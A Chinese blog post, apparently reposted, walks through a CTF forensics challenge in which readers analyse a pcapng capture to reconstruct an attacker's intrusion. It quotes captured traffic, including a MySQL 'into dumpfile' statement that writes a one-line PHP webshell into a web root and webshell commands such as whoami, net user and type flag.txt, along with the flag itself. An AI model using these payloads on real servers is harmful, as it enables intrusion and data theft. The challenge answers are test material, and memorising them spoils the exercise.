记录一次CTF解题思路:pcapng找flag

  • A+
所属分类:CTF专场

样本下载:公众号回复20211016

1、通过分析 Windows7虚拟机上的数据包B. pcapng,找到数据库里的flag最后一个字符是什么?将该字符作为FLAG提交。

2、通过分析数据包B. pcapng,找到黑客扫描到的主机IP是多少?将该IP作为FLAG提交。

3、通过分析数据包B. pcapng,找到服务器的内核版本是多少?将该版本信息作为FLAG提交。

4、通过分析数据包B. pcapng,找到黑客扫描网段的命令是什么?将该命令作为FLAG提交。

5、通过分析数据包B. paeng,找到黑客通过一句话木马上传的第一个文件是什么?将文件名作为FLAG提交。

6、通过分析数据包B. pcapng,找到黑客从服务器上下载的文件,将文件内容作为FLAG提交。

 

一、题目分析

1、pcapng的文件格式一般是wireshark进行抓包并保存的数据。因此,我们可以用在wireshark下打开它。

2、抓包保存的数据一般都是二进制的形式,因此,我们也可以用UltraEdit、Notepad++....等类似的编辑器打开,甚至是“记事本”也可以打开。

3、打开之后再通过分析基本上就可以得到上面的答案了。

 

二、解题思路

1、由于我个人时间有限,我为了方便,我就用 Notepad++ 打开 数据分析-B.pcapng 走马观花的看了一下!可以看到很多如下类似的内容:

我推荐大家用“HxD Hex Editor”,它是一款专业的编辑查看二进制、十六进制软件,可以让我们肉眼很清楚的识别出来。

 

#28000Access denied for user 'root'@'10.0.0.129' (using password: YES)

 

select @@version_comment limit 1

@@version_comment MySQL Community Server (GPL)

4'[email protected]

 

HTTP/1.1
HOST: 239.255.255.250:1900
MAN: "ssdp:discover"
MX: 1
ST: urn:dial-multiscreen-org:service:dial:1
USER-AGENT: Google Chrome/84.0.4147.68 Windows

 

select '<? evla($_POST["cmd"]);?>' into dumpfile "C:/Program Files (x86)/Apache Software Foundation/Apache2.2/htdocs/shell.php"

select load_file("C:/Program Files (x86)/Apache Software Foundation/Apache2.2/htdocs/shell.php")

 

主机名: SERVER2003
OS 名称: Microsoft(R) Windows(R) Server 2003 Standard x64 Edition
OS 版本: 5.2.3790 Service Pack 2 Build 3790
OS 制造商: Microsoft Corporation
OS 配置: 独立服务器

 

2、主要原理是:

打开数据分析包,大家可以直接搜索关键词“cmd=system”关键词,可以找到很多类似于:

搜索其它关键词也可以,例如:mysql的“select"关键词。

 

cmd=system('dir');

 

cmd=system('whoami')

 

cmd=system('netstat -an');

 

cmd=system('net user');

 

cmd=system('systeminfo');

 

cmd=system('type flag.txt');

flag{4de36e4c7f941590b0f8ae2a74051f8e}


3、如果你懂PHP编程语言,以及你懂DOS命令,以上这些类似的代码是什么意思就不言而喻了。

转载地址:https://www.fujieace.com/hacker/ctf-pcapng-flag.html



禁止非法,后果自负

欢迎关注公众号:web安全工具库

欢迎关注视频号:之乎者也吧

记录一次CTF解题思路:pcapng找flag

记录一次CTF解题思路:pcapng找flag

记录一次CTF解题思路:pcapng找flag

原文始发于微信公众号(web安全工具库):记录一次CTF解题思路:pcapng找flag

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: